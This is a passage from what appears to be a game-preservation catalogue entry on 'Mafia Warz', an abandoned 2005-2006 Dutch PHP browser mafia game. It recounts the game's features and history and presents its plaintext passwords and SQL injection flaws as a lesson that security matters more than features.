• NEAB Explorer (game 43): 8/10, professional engine

Preservation Priority: MEDIUM-HIGH

Justification:

• Only never-released beta in collection (unique status)
• BETATESTERS.txt = rare historical artifact (real test accounts!)
• Dutch gaming history (part of Barafranca/Omerta era)
• Largest hobbyist codebase (226 files, 30,200 lines)
• Organized crime innovation (4-player heists)
• Security case study (perfect "what NOT to do" example)

The Mafia Warz Story

2005-2006: Unknown Dutch developer ("mic4"?) creates massive mafia game:

• 226 PHP files
• 30,200 lines of code
• 16 Flash animations
• 355 emoticons
• 6-country travel system
• 4-player organized crime
• Car racing mini-game
• Auction house
• Multi-language support

Early 2006: Beta testing begins:

• "InchOfHope" (British)
• "assasain" (British)
• Sample data populated (user "mic4" owns all airports)

March 1, 2006: Final SQL dump created (last known activity)

2006: Project abandoned:

• Never publicly launched
• Security too weak (plaintext passwords, SQL injection)
• Competition too strong (Barafranca/Omerta dominant)
• Developer gave up (massive technical debt, no community)

2006-2025: Lost to history:

• No website
• No community
• No documentation
• Only archived beta survives

The Lesson: Ambition without security = failure

Mafia Warz had better features than many competitors (organized crime, airports, car racing), but catastrophic security prevented launch. Meanwhile, Barafranca (2003) with basic security but strong community survived 22 years.

Key Takeaway: Security > Features. Community > Code. Launch > Perfection.

Mafia Warz tried to build the perfect mafia game (226 files!) but forgot security basics (plaintext passwords!). It never launched. Barafranca launched fast with decent security and built community. It's still running.

Quote from preservation: "The graveyard of game development is full of ambitious projects that never launched. Mafia Warz is one of them."

---

Archive Status: PRESERVED (Beta Artifact)

Analysis Date: December 11, 2025

Game Number: 46 of 79

Analyst Notes: This is the first never-released beta in the collection (games 1-46). BETATESTERS.txt with real accounts = preservation gold (historical research value). Largest hobbyist codebase yet (226 files, 30,200 lines). Catastrophic security (1/10 - tied with Mob Star for worst). Dutch developer ("mic4"), English interface, sample data included. Represents Dutch browser gaming scene (2005-2008 - Barafranca/Omerta era). 4-player organized crime = innovative mechanic. Flash SWF files dead 2020. Never launched publicly = zero impact/legacy. Security disaster prevented release - lesson: security > features. Worth preserving as beta artifact and security anti-pattern case study.